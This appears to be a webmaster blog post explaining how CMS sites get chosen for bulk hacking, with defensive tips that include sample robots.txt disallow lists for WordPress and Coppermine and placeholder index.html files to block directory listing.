Herself’s Webtools

Once upon a time only the larger websites got hacked. The reason they were hacked was someone wanted to show off or make a political statement.

Times have changed. Now sites are hacked in bulk and the hack is done to promote less ethical websites or to deliver payloads of malware to home pcs.

So if your website was a victim of one of the recent bulk attacks how did you get chosen?

The first thing that happens is that a security flaw is found in a commonly used CMS ( content management system ). It might be Coppermine, Wordpress or any of the other popular systems. The more popular the software is, the more people are looking to find a weak spot in the software.

Once a flaw is found in the software a script is written to take advantage of the flaw.

Next a search is done to compile a list of sites running the software. For instance if you use ‘Acme photo content management’ and a flaw is found in the file acme.php; then a search is done for acme.php. The site list is compiled by a bot and all the sites are attacked over a very short time. Or a Perl script is run on across several websites looking for flawed programs. ( See RFI vulnerability scanner )

One way to help keep your site off the list is to keep those files off of Google and other search engines. Use your robots.txt file and disallow all directories the public does not see. For WordPress disallow /wp-admin and /wp-content/plugins. Go through your website and disallow in robots.txt all the directories not meant for public viewing.

For Wordpress I disallow:
User-agent: *
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/themes
Disallow: wp-app.php
Disallow: wp-atom.php
Disallow: wp-blog-header.php
Disallow: wp-comments-post.php
Disallow: wp-config-sample.php
Disallow: wp-config.php
Disallow: wp-cron.php
Disallow: wp-feed.php
Disallow: wp-login.php
Disallow: wp-links-opml.php
Disallow: wp-mail.php
Disallow: wp-pass.php
Disallow: wp-rdf.php
Disallow: wp-register.php
Disallow: wp-rss.php
Disallow: wp-rss2.php
Disallow: wp-settings.php
Disallow: wp-trackback.php
Disallow: xmlrpc.php

For Coppermine I disallow:

Disallow: /coppermine/bridge
Disallow: /coppermine/docs
Disallow: /coppermine/images
Disallow: /coppermine/include
Disallow: /coppermine/lang
Disallow: /coppermine/logs
Disallow: /coppermine/plugins
Disallow: /coppermine/sql
Disallow: /coppermine/themes
Disallow: /coppermine/addfav.php
Disallow: /coppermine/addpic.php
Disallow: /coppermine/admin.php
Disallow: /coppermine/albmgr.php
Disallow: /coppermine/anycontent.php
Disallow: /coppermine/banning.php
Disallow: /coppermine/bridgemgr.php
Disallow: /coppermine/calendar.php
Disallow: /coppermine/catmgr.php
Disallow: /coppermine/CHANGELOG
Disallow: /coppermine/charsetmgr.php
Disallow: /coppermine/config.php
Disallow: /coppermine/COPYING
Disallow: /coppermine/db_ecard.php
Disallow: /coppermine/db_input.php
Disallow: /coppermine/delete.php
Disallow: /coppermine/displayecard.php
Disallow: /coppermine/displayreport.php
Disallow: /coppermine/ecard.php
Disallow: /coppermine/editOnePic.php
Disallow: /coppermine/editpics.php
Disallow: /coppermine/exifmgr.php
Disallow: /coppermine/faq.php
Disallow: /coppermine/forgot_password.php
Disallow: /coppermine/getlang.php
Disallow: /coppermine/groupmgr.php
Disallow: /coppermine/image_processor.php
Disallow: /coppermine/install.php
Disallow: /coppermine/installer.css
Disallow: /coppermine/keyword_create.dict.php
Disallow: /coppermine/keywordmgr.php
Disallow: /coppermine/image_processor.php
Disallow: /coppermine/login.php
Disallow: /coppermine/logout.php
Disallow: /coppermine/minibrowser.php
Disallow: /coppermine/mode.php
Disallow: /coppermine/modifyalb.php
Disallow: /coppermine/phpinfo.php
Disallow: /coppermine/picEditor.php
Disallow: /coppermine/pluginmgr.php
Disallow: /coppermine/profile.php
Disallow: /coppermine/ratepic.php
Disallow: /coppermine/README.TXT
Disallow: /coppermine/register.php
Disallow: /coppermine/relocate_server.php
Disallow: /coppermine/report_file.php
Disallow: /coppermine/reviewcom.php
Disallow: /coppermine/scripts.js
Disallow: /coppermine/search.php
Disallow: /coppermine/searchnew.php
Disallow: /coppermine/showthumb.php
Disallow: /coppermine/stat_details.php
Disallow: /coppermine/update.php
Disallow: /coppermine/upgrade-1.0-to1.2.php
Disallow: /coppermine/upload.php
Disallow: /coppermine/usermgr.php
Disallow: /coppermine/util.php
Disallow: /coppermine/versioncheck.php
Disallow: /coppermine/viewlog.php
Disallow: /coppermine/xp_publish.php
Disallow: /coppermine/zipdownload.php

See Robots.txt and how to use it.

Go through your logs and if you see robots crawling your site that you don’t know. Find out who they are. If you still don’t know - banish them using your .htaccess file.

Next you want to check each directory on your website. If a directory does not have an index.html file, then when someone types that directory into a browser a list of all the files in that directory is shown on the webpage.

You can prevent this by creating a index.html file and placing it in every directory that does not already have one. Mine just says ‘You should not be here’. Yours could include a link back to the home page of the site or anything else you’d like. This keeps prying eyes out of places they should not be.

See also: Are your directories showing?

More information:
MySQL Injection attacks
3 Must Apply Security Tips for WordPress
How to secure WordPress sites